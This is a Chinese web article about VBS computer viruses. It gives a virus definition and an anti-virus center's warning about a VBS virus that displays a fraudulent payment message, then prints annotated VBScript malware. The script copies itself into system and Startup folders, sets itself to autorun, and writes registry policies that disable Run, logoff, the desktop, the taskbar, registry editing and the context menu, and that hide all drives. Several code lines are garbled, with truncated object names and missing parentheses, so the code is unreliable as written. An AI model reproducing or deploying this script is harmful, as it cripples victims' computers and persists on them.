vbs的电脑病毒代码是怎样的

　　计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。这是目前官方最权威的关于计算机病毒的定义，此定义也被通行的《计算机病毒防治产品评级准则》的国家标准所采纳。以下是学习啦网小编为大家整理的关于vbs电脑病毒代码的相关知识，希望对大家有所帮助!

　　上海计算机病毒防范服务中心提醒，本周需防范一种在网上流行的“VBS病毒”(Virus.VBS.d)，该病毒不但导致多种杀毒软件不能运行，而且还会弹出“解毒号码”等欺诈信息，要求被害用户向指定账户汇款，反病毒专家提醒用户不要被这种欺诈信息迷惑。

　　据介绍，这种病毒可以导致多种杀毒软件或工具不能正常运行。更值得注意的是，当病毒感染的文件数超过2000个，会弹出对话框提示信息，提示内容为：“您已有超过2000个文件被感染!不过请放心，此病毒很容易被清除!请联系418465***!”反病毒专家分析，这个号码是QQ号，受害用户一旦加入这个号码，会被要求向指定账户汇款。专家提醒这通常是欺诈行为，受害用户要以正常方式杀毒，不要轻信这种欺诈信息。

　　专家建议，平时用户上网时要开启防病毒软件的实时监控功能，并关闭U盘的“自动播放功能”。用户可针对自己计算机安装的操作系统，找到相应的安全漏洞补丁，下载并安装。以遏制利用这些漏洞进行传播的病毒，减少病毒给计算机用户带来的危害。

　　on error resume next

　　set fs=createobject("ing.filesystemobject" '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作

　　set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置

　　set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置

　　set so=createobject("ing.filesystemobject"

　　dim r '定义一个变量

　　set r=createobject("w.shell"

　　so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置

　　so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '复制病毒副本到system32/system文件夹位置

　　so.getfile(w.fullname).copy(dir1&"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单

　　'下面是对注册表的恶意修改和简单的依靠oe传播

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表，禁止“运行”菜单

　　r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表，禁止“关闭”菜单

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注册表，隐藏所有逻辑盘符

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表，禁止注册表编辑

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表，禁止开机注册表扫描

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表，禁止“注销”菜单

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表，禁止ms-dos实模式

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表，使这个脚本本身开机自动运行

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表，禁止显示桌面图标

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表，禁止纯dos模式

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表，禁止“任务栏和开始”菜单

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表，禁止右键菜单